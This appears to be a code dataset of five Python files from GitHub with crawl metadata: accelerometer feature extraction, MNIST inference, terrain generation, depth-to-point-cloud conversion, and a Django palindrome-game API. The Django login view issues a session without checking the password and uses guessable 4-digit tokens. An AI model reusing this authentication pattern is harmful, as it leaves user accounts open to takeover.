+{"seq_id": "43151149391", "text": "import pandas as pd\nimport numpy as np \nfrom scipy import stats\nfrom scipy.signal import find_peaks\n\ndef features_extract (df, accx, accy, accz, activity, window_size, step_size): \n # features based on accx, accy, accz\n x_list = []\n y_list = []\n z_list = []\n labels = []\n\n # overlapping windows\n for i in range(0, len(df) - window_size + 1, step_size):\n # arrays per axis\n xs = df[accx].values[i: i + window_size]\n ys = df[accy].values[i: i + window_size]\n zs = df[accz].values[i: i + window_size]\n\n # label with most occurrences in window\n input_array = np.array(df[activity][i: i + window_size], dtype=float)\n label = stats.mode(input_array)[0]\n\n x_list.append(xs)\n y_list.append(ys)\n z_list.append(zs)\n labels.append(label)\n\n # converting the lists to series\n x_series_td = pd.Series(x_list)\n y_series_td = pd.Series(y_list)\n z_series_td = pd.Series(z_list)\n\n # converting the signals from time domain to frequency domain using FFT\n fft_size = int((window_size/2)) + 1\n\n x_series_fft = x_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n y_series_fft = y_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n z_series_fft = z_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n\n X = pd.DataFrame()\n y = np.array(labels)\n y = y.astype(int)\n\n for tp in ['td', 'fft']:\n\n for axis in ['x','y','z']:\n \n series = locals()[f'{axis}_series_{tp}']\n\n ################## simple statistics features ##################\n # mean\n X[f'{axis}_mean_{tp}'] = series.apply(lambda x: x.mean())\n # mean abs diff\n X[f'{axis}_meandiff_{tp}'] = series.apply(lambda x: np.mean(np.absolute(x - np.mean(x))))\n # min\n X[f'{axis}_min_{tp}'] = series.apply(lambda x: x.min())\n # max\n X[f'{axis}_max_{tp}'] = series.apply(lambda x: x.max()) \n # max-min diff\n X[f'{axis}_minmax_{tp}'] = X[f'{axis}_max_{tp}'] - X[f'{axis}_min_{tp}']\n # median\n X[f'{axis}_median_{tp}'] = series.apply(lambda x: np.median(x))\n # median abs diff \n X[f'{axis}_mediandiff_{tp}'] = series.apply(lambda x: np.median(np.absolute(x - np.median(x))))\n # std dev\n X[f'{axis}_std_{tp}'] = series.apply(lambda x: x.std())\n # interquartile range\n X[f'{axis}_quart_{tp}'] = series.apply(lambda x: np.percentile(x, 75) - np.percentile(x, 25))\n\n # indexes\n # index of min value in window\n if tp == 'td':\n X[f'{axis}_argmin_{tp}'] = series.apply(lambda x: np.argmin(x))\n # index of max value in window\n X[f'{axis}_argmax_{tp}'] = series.apply(lambda x: np.argmax(x))\n else:\n X[f'{axis}_argmin_{tp}'] = series.apply(lambda x: np.argmin(np.abs(np.fft.fft(x))[1:fft_size]))\n # index of max value in window\n X[f'{axis}_argmax_{tp}'] = series.apply(lambda x: np.argmax(np.abs(np.fft.fft(x))[1:fft_size]))\n \n # abs max-min index diff\n X[f'{axis}_minmaxarg_{tp}'] = abs(X[f'{axis}_argmax_{tp}'] - X[f'{axis}_argmin_{tp}'])\n \n # only for time domain\n if tp == 'td': \n # negtive values count\n X[f'{axis}_negatives_{tp}'] = series.apply(lambda x: np.sum(x < 0))\n # positive values count\n X[f'{axis}_positives_{tp}'] = series.apply(lambda x: np.sum(x > 0))\n \n # values above mean\n X[f'{axis}_meanabove_{tp}'] = series.apply(lambda x: np.sum(x > x.mean()))\n # skewness\n X[f'{axis}_skewness_{tp}'] = series.apply(lambda x: stats.skew(x))\n # kurtosis\n X[f'{axis}_kurtosis_{tp}'] = series.apply(lambda x: stats.kurtosis(x))\n\n\n ################## signal based features ##################\n # count peaks in signal\n X[f'{axis}_peaks_{tp}'] = series.apply(lambda x: 
len(find_peaks(x)[0]))\n # power of signal: average of the squared signal\n X[f'{axis}_power_{tp}'] = series.apply(lambda x: np.mean(x**2))\n \n # over all axis\n seriesx = locals()[f'x_series_{tp}']\n seriesy = locals()[f'y_series_{tp}']\n seriesz = locals()[f'z_series_{tp}']\n\n # signal magnitude area\n X[f'SMA_{tp}'] = seriesx.apply(lambda x: np.mean(abs(x))) + seriesy.apply(lambda x: np.mean(abs(x))) + seriesz.apply(lambda x: np.mean(abs(x)))\n\n # avg resultant\n X[f'avg_result_accl_{tp}'] = [i.mean() for i in ((seriesx**2 + seriesy**2 + seriesz**2)**0.5)]\n\n return X, y", "repo_name": "ylekka/thesisYL", "sub_path": "AR_features_extract.py", "file_name": "AR_features_extract.py", "file_ext": "py", "file_size_in_byte": 4834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.stats.mode", "line_number": 22, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 22, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.stats.skew", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 95, 
"usage_type": "name"}, {"api_name": "scipy.stats.kurtosis", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 97, "usage_type": "name"}, {"api_name": "scipy.signal.find_peaks", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 112, "usage_type": "call"}]}
+{"seq_id": "36186750258", "text": "# coding: utf-8\nimport sys, os\nsys.path.append(os.pardir) # 부모 디렉터리의 파일을 가져올 수 있도록 설정\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom dataset.mnist import load_mnist\nfrom simple_convnet import SimpleConvNet\nfrom common.trainer import Trainer\n\n# 데이터 읽기\n(x_train, t_train), (x_test, t_test) = load_mnist(flatten=False)\n\n# 시간이 오래 걸릴 경우 데이터를 줄인다.\n#x_train, t_train = x_train[:5000], t_train[:5000]\n#x_test, t_test = x_test[:1000], t_test[:1000]\n\nmax_epochs = 20\n\nnetwork = SimpleConvNet(input_dim=(1,28,28), \n conv_param = {'filter_num': 30, 'filter_size': 5, 'pad': 0, 'stride': 1},\n hidden_size=100, output_size=10, weight_init_std=0.01)\n\n# 파라미터 저장\npath_dir = './ckpt'\nfile_name = \"simple_convnet_params.pkl\"\nif not os.path.isdir(path_dir):\n os.mkdir(path_dir)\n\nprint(\"Load Network Parameters!\")\nnetwork.load_params(os.path.join(path_dir, file_name))\n\ntest_acc = network.accuracy(x_test, t_test)\nprint(\"test acc | \", format(test_acc*100, \".2f\"), '%')\n", "repo_name": "idsdlab/basicai_fa23", "sub_path": "week13_lab/mnist/inference_simple_convnet_mnist.py", "file_name": "inference_simple_convnet_mnist.py", "file_ext": "py", "file_size_in_byte": 1099, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.pardir", "line_number": 3, "usage_type": "attribute"}, {"api_name": "dataset.mnist.load_mnist", "line_number": 11, "usage_type": "call"}, {"api_name": "simple_convnet.SimpleConvNet", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}]}
+{"seq_id": "35448366707", "text": "#!/usr/bin/python3\n\nimport argparse\nimport math\nimport random\n\nimport numpy\nfrom PIL import Image\n\ndef scaled_random(mag):\n return (2 * random.random() - 1.0) * mag\n\ndef diamond(array, x, y, size, mag):\n \"\"\"For each square in the array, set the midpoint of that square to be the\n average of the four corner points plus a random value.\n \"\"\"\n half = size // 2\n\n x1 = x + size\n y1 = y + size\n\n a = array[x, y]\n b = array[x1, y]\n c = array[x1, y1]\n d = array[x, y1]\n\n array[x + half, y + half] = (a + b + c + d) / 4.0 + scaled_random(mag)\n\ndef square(array, x, y, size, mag):\n \"\"\"For each diamond in the array, set the midpoint of that diamond to be\n the average of the four corner points plus a random value. \"\"\"\n\n x1 = x - size\n y1 = y - size\n x2 = x + size\n y2 = y + size\n\n div = 4.0\n\n l = len(array)\n\n if x1 >= 0:\n a = array[x1, y]\n else:\n a = 0.0\n div -= 1.0\n if y1 >= 0:\n b = array[x, y1]\n else:\n b = 0.0\n div -= 1.0\n if x2 < l:\n c = array[x2, y]\n else:\n c = 0.0\n div -= 1.0\n if y2 < l:\n d = array[x, y2]\n else:\n d = 0.0\n div -= 1.0\n\n if div:\n array[x, y] = (a + b + c + d) / div + scaled_random(mag)\n\ndef diamond_square(array, step, mag, red):\n if step < 2:\n return\n\n l = len(array) - 1\n half = step // 2\n\n for x in range(0, l, step):\n for y in range(0, l, step):\n diamond(array, x, y, step, mag)\n\n for x in range(0, l + 1, step):\n for y in range(0, l + 1, step):\n if x < l:\n square(array, x + half, y, half, mag)\n if y < l:\n square(array, x, y + half, half, mag)\n\n mag *= red\n\n diamond_square(array, half, mag, red)\n\ndef main():\n parser = argparse.ArgumentParser(\"Diamond-square terrain generator\")\n parser.add_argument(\"--seed\", type=int, default=None,\n help=\"Random seed\")\n parser.add_argument(\"--size\", type=int, default=256,\n help=\"Image size (rounded up to power of 2)\")\n parser.add_argument(\"filename\", nargs=1,\n help=\"Target file name\")\n args = parser.parse_args()\n\n if args.size < 2:\n args.size = 2\n else:\n args.size = 2 ** int(math.log2(args.size - 1) + 1)\n\n if args.seed:\n random.seed(args.seed)\n else:\n random.seed()\n\n array = numpy.zeros((args.size + 1, args.size + 1), dtype=numpy.float32)\n\n array[0,0] = scaled_random(2)\n array[0,args.size] = scaled_random(2)\n array[args.size,0] = scaled_random(2)\n array[args.size,args.size] = scaled_random(2)\n\n diamond_square(array, args.size, 1.0, 0.5)\n\n minimum = numpy.amin(array)\n maximum = numpy.amax(array)\n\n array -= minimum\n maximum -= minimum\n\n array = array * (255.0 / maximum)\n\n barray = numpy.array(array, dtype=numpy.ubyte)\n\n im = Image.frombuffer(\"L\", (args.size + 1, args.size + 1),\n memoryview(barray), \"raw\", \"L\", 0, 1)\n im = im.crop((0, 0, args.size, args.size))\n\n px = im.load()\n\n im.save(args.filename[0])\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "Jajcus/vulkanplay", "sub_path": "utils/diamond_square.py", "file_name": "diamond_square.py", "file_ext": "py", "file_size_in_byte": 3199, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.random", "line_number": 11, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 89, "usage_type": "call"}, {"api_name": "math.log2", "line_number": 101, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 104, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 106, "usage_type": 
"call"}, {"api_name": "numpy.zeros", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.amin", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.ubyte", "line_number": 125, "usage_type": "attribute"}, {"api_name": "PIL.Image.frombuffer", "line_number": 127, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 127, "usage_type": "name"}]}
+{"seq_id": "32395300060", "text": "# TODO:给定图像的关键点坐标,根据深度相机得到三���空间坐标\n# 目的是为了模型注册\n\n# 输入: 图片\n# 输出: 3d点\n# 规定图像尺度为像素\n# 实际坐标的尺度为mm\n\nimport pyrealsense2 as rs\nfrom numpy import *\nimport numpy as np\n\nimport open3d as o3d\nimport cv2\n\nimport os\nimport time\nfrom enum import IntEnum\n\nfrom o3d_pose_lib import *\n\nnp.set_printoptions(suppress=True)\n\n\n# 这个是将整个深度图转为点云\ndef get_cloud_xyz(depth, scale, u0, v0, fx, fy):\n global xmap, ymap\n zmap = depth.flatten()\n\n print('xmap:', xmap.shape)\n print('ymap:', ymap.shape)\n print('zmap:', zmap.shape)\n\n # Z = zmap * scale\n Z = zmap\n X = (xmap - v0) * Z / fx\n Y = (ymap - u0) * Z / fy\n\n X = X[:, newaxis].astype(np.float32)\n Y = Y[:, newaxis].astype(np.float32)\n Z = Z[:, newaxis].astype(np.float32)\n\n cloud = np.concatenate((X, Y, Z), axis=1)\n\n return cloud\n\n\n# 添加颜色 问题:有一点对齐误差\ndef get_cloud_xyzrgb(depth, color, scale, u0, v0, fx, fy):\n global xmap, ymap\n\n # zmap = depth.flatten()\n zmap = depth.reshape(-1)\n # Z = zmap * scale # 乘 就变成了m为单位\n Z = zmap\n Y = (xmap - v0) * Z / fy # 因为检索时xy实际上是y行x列\n X = (ymap - u0) * Z / fx\n\n X = X[:, newaxis].astype(np.float32) # 可以优化\n Y = Y[:, newaxis].astype(np.float32)\n Z = Z[:, newaxis].astype(np.float32)\n cloud = np.concatenate((X, Y, Z), axis=1) # 拼接坐标\n\n # colors\n rgbs = color.reshape(-1, 3)\n\n return cloud, rgbs / 255\n\n\n# 将单个xyZ转为XYZ 图像坐标-》相机坐标\ndef get_xyz(pix, Z, u0, v0, fx, fy): # (x,y)\n Y = (pix[0] - v0) / fy * Z\n X = (pix[1] - u0) / fx * Z\n pt_w = np.array([X, Y, Z])\n return pt_w\n\n\nif __name__ == \"__main__\":\n\n # 参数设置\n\n # 画幅\n # width = 1280\n # height = 720\n\n width = 512\n height = 424\n\n # 最简单的测试:给定一个xyz,得到XYZ\n # 像素坐标映射\n xmap, ymap = mgrid[0:height, 0:width] # 前面是行范围 后面是列范围 对应到图像坐标,则xmap是y范围\n xmap, ymap = xmap.flatten(), ymap.flatten()\n\n # Getting the depth sensor's depth scale (see rs-align example for explanation)\n depth_scale = 0.001\n print('depth_scale:', depth_scale)\n\n # We will not display the background of objects more than\n # clipping_distance_in_meters meters away\n clipping_distance_in_meters = 3 # 阈值 meter\n clipping_distance = clipping_distance_in_meters / depth_scale\n\n # Create an align object\n # align_to = rs.stream.color # 将depth对齐到color\n # align = rs.align(align_to)\n\n # 内参 ----------------------\n # intrinsic = get_intrinsic_matrix(color_frame)\n # print(intrinsic)\n # u0, v0 = intrinsic.ppx, intrinsic.ppy\n # fx, fy = intrinsic.fx, intrinsic.fy\n u0, v0 = width / 2, height / 2\n fx, fy = 0.001, 0.001\n\n dist_coeffs = zeros((4, 1)) # Assuming no lens distortion\n\n # 保存内参\n # intrinsic_mat = np.array([[fx, 0, u0],\n # [0, fy, v0],\n # [0, 0, 1]])\n\n # OPEN3D begain ---------------------\n vis = o3d.visualization.Visualizer()\n vis.create_window(window_name='ANTenna3D')\n\n # 设置窗口背景颜色\n opt = vis.get_render_option()\n opt.background_color = np.asarray([0, 0., 0.0]) # up to 1\n # print(dir(opt))\n\n pcd = o3d.geometry.PointCloud()\n flip_transform = [[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]]\n\n coord = o3d.geometry.TriangleMesh.create_coordinate_frame(origin=[0, 0, 0], size=0.1) # 坐标系\n coord.transform(flip_transform)\n # OPEN3D end\n\n # Streaming loop\n frame_count = 0\n\n # while True:\n for frame_idx in range(1):\n\n s_time = time.time()\n\n frame_path = 'D:/SIA/Dataset/Kinect2/depth/1.bmp'\n\n # Align the depth frame to color frame\n # aligned_frames = align.process(frames)\n\n # 对齐 rgbd\n # 加载\n depth_img = cv2.imread(frame_path, 0)\n print(depth_img)\n print(shape(depth_img))\n\n # 整个点云\n 
pts = get_cloud_xyz(depth_img, depth_scale, u0, v0, fx, fy)\n # pts, color = get_cloud_xyzrgb(depth_img, rgb_img, depth_scale, u0, v0, fx, fy)\n # print(pts.shape)\n\n # # 使用open3d 查看效果\n pcd.points = o3d.utility.Vector3dVector(pts) # 效率极低! 30FPS -》 2.7FPS。。。\n # pcd.colors = o3d.utility.Vector3dVector(color)\n\n # show_pcd(pcd)\n\n # 写文件\n o3d.io.write_point_cloud(str(frame_count) + '.ply', pcd)\n\n pcd.transform(flip_transform)\n\n if frame_count == 0:\n vis.add_geometry(pcd)\n vis.add_geometry(coord)\n\n vis.update_geometry(pcd)\n vis.poll_events()\n vis.update_renderer()\n\n frame_count += 1\n\n delta_time = time.time() - s_time\n print('FPS:', 1/delta_time)\n", "repo_name": "antenna-fast/PoseEstimation", "sub_path": "dataset/real_camera/depth_to_pcd.py", "file_name": "depth_to_pcd.py", "file_ext": "py", "file_size_in_byte": 4976, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.set_printoptions", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "open3d.visualization.Visualizer", "line_number": 123, "usage_type": "call"}, {"api_name": "open3d.visualization", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 128, "usage_type": "call"}, {"api_name": "open3d.geometry.PointCloud", "line_number": 131, "usage_type": "call"}, {"api_name": "open3d.geometry", "line_number": 131, "usage_type": "attribute"}, {"api_name": "open3d.geometry.TriangleMesh.create_coordinate_frame", "line_number": 134, "usage_type": "call"}, {"api_name": "open3d.geometry", "line_number": 134, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 153, "usage_type": "call"}, {"api_name": "open3d.utility.Vector3dVector", "line_number": 163, "usage_type": "call"}, {"api_name": "open3d.utility", "line_number": 163, "usage_type": "attribute"}, {"api_name": "open3d.io.write_point_cloud", "line_number": 169, "usage_type": "call"}, {"api_name": "open3d.io", "line_number": 169, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}]}
+{"seq_id": "32477861647", "text": "from django.contrib.auth.models import User as auth_user\nfrom django.http import JsonResponse\nimport json\nfrom random import randint\n\nfrom .models import *\n\n# Create your views here.\n\ndef get_session_obj(token):\n return Session.objects.filter(token = token).first()\n\ndef check_session(session):\n return (session is None) or (not session.status)\n\ndef create_new_user(request):\n if request.method == 'POST':\n payload = json.loads(request.body)\n user_name = payload['name']\n user_email = payload['email']\n user_password = payload['password']\n\n isUserExists = auth_user.objects.filter(email=user_email).first()\n if isUserExists:\n return JsonResponse({'status':'User Already Exists'})\n else:\n new_auth_user = auth_user.objects.create_user(username = user_name, email=user_email, password=user_password)\n if new_auth_user:\n new_user = User()\n new_user.to_db(payload)\n new_user.save()\n return JsonResponse({'status':'User Created Successfully'})\n else:\n return JsonResponse({'status':'Failed to Create New User'})\n \n else:\n return JsonResponse({'status':'Invalid Request Method, only POST Method is Allowed'})\n\ndef update_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n payload = json.loads(request.body)\n user_obj = User.objects.filter(id = session_obj.user.id).first()\n user_obj.to_db(payload)\n user_obj.save()\n return JsonResponse({'status': 'User Details Updated Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef delete_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n auth_obj = auth_user.objects.filter(email = session_obj.user.email)\n auth_obj.delete()\n\n user_obj = User.objects.filter(id = session_obj.user.id).first()\n user_obj.delete()\n return JsonResponse({'status': 'User Deleted Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef login_user(request):\n if request.method == 'POST':\n payload = json.loads(request.body)\n user_email = payload['email']\n user_password = payload['password']\n\n auth_obj = auth_user.objects.filter(email = user_email).first()\n if auth_obj is not None:\n user_obj = User.objects.filter(email = user_email).first()\n session_obj = Session.objects.filter(user = user_obj).first()\n if session_obj is None:\n token = randint(1000, 9999)\n data = {'token': token, 'status': True, 'user': user_obj}\n\n session_obj = Session()\n session_obj.to_db(data)\n session_obj.save()\n return JsonResponse({'status': 'User Logged in Successfully', 'token': token})\n \n else:\n if session_obj.status:\n return JsonResponse({'status': 'User Already Logged in'})\n else:\n session_obj.status = True\n session_obj.save()\n return JsonResponse({'status': 'User Logged in Successfully', 'token': session_obj.token})\n \n else:\n return JsonResponse({'status': 'User Does Not Exist'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n \ndef logout_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return 
JsonResponse({'status': 'User not Logged in'})\n else:\n session_obj.status = False\n session_obj.save()\n return JsonResponse({'status': 'User Logged out Successfully'})\n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef check_palindrome(string):\n return string == string[::-1]\n\ndef start_game(request):\n if request.method == 'GET':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game = Game.objects.filter(session = session_obj).first()\n if game is not None:\n game.status = False\n game.save()\n \n new_game = Game()\n new_game.session = session_obj\n new_game.save()\n return JsonResponse({'status':'Game Started Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n\ndef get_board(request):\n if request.method == 'GET':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game_obj = Game.objects.filter(session = session_obj).first()\n return JsonResponse({'string': game_obj.game_string})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n\ndef update_board(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n game_obj = Game.objects.filter(session = session_obj).first()\n if len(game_obj.game_string) == 6:\n is_palindrome = check_palindrome(game_obj.game_string)\n game_obj.is_palindrome = is_palindrome\n game_obj.save()\n return JsonResponse({'status': 'Game String is a Palindrome (Cannot Update the Board Anymore)' if is_palindrome else 'Game String is not a Palindrome (Cannot Update the Board Anymore)'})\n else:\n payload = json.loads(request.body)\n game_obj.game_string = game_obj.game_string + payload['char'][0]\n game_obj.save()\n return JsonResponse({'status': 'Updated Game Board'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n \ndef get_game_list(request):\n if request.method == 'GET':\n games = Game.objects.all()\n game_ids = []\n for each_game in games:\n print(each_game)\n game_ids.append(each_game.pk)\n return JsonResponse({'Games IDs': game_ids})\n else:\n return JsonResponse({'status': 'Invalid Request Method, Only GET Method is Allowed'})\n", "repo_name": "laminarss/palindrome-game-django", "sub_path": "project_palindrome/app_game/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 27, 
"usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 27, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 32, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 44, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 60, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 62, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 67, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 74, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 78, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 83, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 89, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 93, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 97, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 100, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 103, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 110, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 114, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 116, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 126, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 136, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 139, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 146, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 149, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 152, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 159, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 166, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 168, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 171, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 174, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 183, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 185, "usage_type": "call"}]}
